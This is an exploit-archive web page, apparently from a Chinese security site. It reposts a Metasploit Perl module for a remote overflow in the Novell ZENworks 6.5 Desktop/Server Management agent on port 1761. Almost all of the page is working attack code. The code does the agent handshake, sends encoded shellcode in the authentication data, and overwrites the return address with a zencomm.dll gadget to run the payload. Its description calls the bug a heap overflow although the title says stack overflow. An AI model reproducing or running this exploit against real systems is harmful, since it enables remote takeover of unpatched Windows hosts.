首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Novell ZENworks 6.5 Desktop/Server Management Stack Overflow Exploit
来源:www.vfocus.net 作者:vfocus 发布时间:2005-08-15  

Novell ZENworks 6.5 Desktop/Server Management Stack Overflow Exploit

Ports : 1761

package Msf::Exploit::zenworks_desktop_agent;
use strict;
use base "Msf::Exploit";
use Pex::Text;

my $advanced = { };

my $info =
{
'Name' => 'ZENworks 6.5 Desktop/Server Management Remote Stack Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' =>
[
'Anonymous',
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winxp', 'win2k', 'win2003' ],
'Priv' => 1,

'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 1761 ],
},

'Payload' =>
{
'Space' => 0x7FFF,
'BadChars' => "\x00",
'Keys' => ['+ws2ord'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits a heap overflow in the Novell ZENworks
Desktop Management agent.
}),

'Refs' =>
[
['BID', 13678],
],

'Targets' =>
[
[ 'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent', 0x10002e06]
],

'Keys' => ['zenworks'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );

my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);

if ( $s->IsError ) {
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
return;
}

my $req = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77";
$self->PrintLine( "[*] Sending version identication" );
$s->Send($req);

my $ident = $s->Recv(-1, 16);
if (length($ident) != 16)
{
$self->PrintLine( "[*] Failed to receive agent version identication" );
return;
}
else
{
$self->PrintLine( "[*] Received agent version identication" );
}

$req = "\x00\x01";
$self->PrintLine( "[*] Sending client acknowledgment" );
$s->Send($req);

# stack overflow in ZenRem32.exe / ZENworks Server Management

$req = "\x00\x06metmet\x00\x06metmet\x7F\xFF" . $shellcode . "\x00\x01";
$self->PrintLine( "[*] Sending authentication data (including shellcode)" );
$s->Send($req);

$s->Recv(2, 2);
$s->Send("\x00\x01");

#$s->Recv(2, 2);
#my $len = $s->Recv(2,2);
#$len = unpack ('n', $len);
#$s->Recv($len, $len);

$s->Send("\x00\x02");

$self->PrintLine( "[*] Sending final payload" );

# pop/pop/pop/pop/pop/ret in zencomm.dll on our shellcode
my $crash = "A" x 0x20;
$req = "\x00\x24" . $crash . pack('V', $target->[1]);
$s->Send($req);

$self->PrintLine("[*] Overflow request sent, sleeping for four seconds");
select(undef, undef, undef, 4);

$self->Handler($s);
return;
}

1;




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·(MS05-039)Microsoft Windows 20
·MDaemon IMAP CRAM-MD5 Authenti
·(MS05-039)Microsoft Windows 20
·Novell eDirectory Server iMoni
·Veritas Backup Exec Windows Ag
·Windows 2000 universal exploit
·(MS05-039)Microsoft Windows Pl
·Iwconfig Buffer Overflow
·(MS05-038)Microsoft Internet E
·Mdaemon Buffer Overflow
·(MS05-041)Microsoft Windows Re
·Ifenslave Buffer Overflow
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved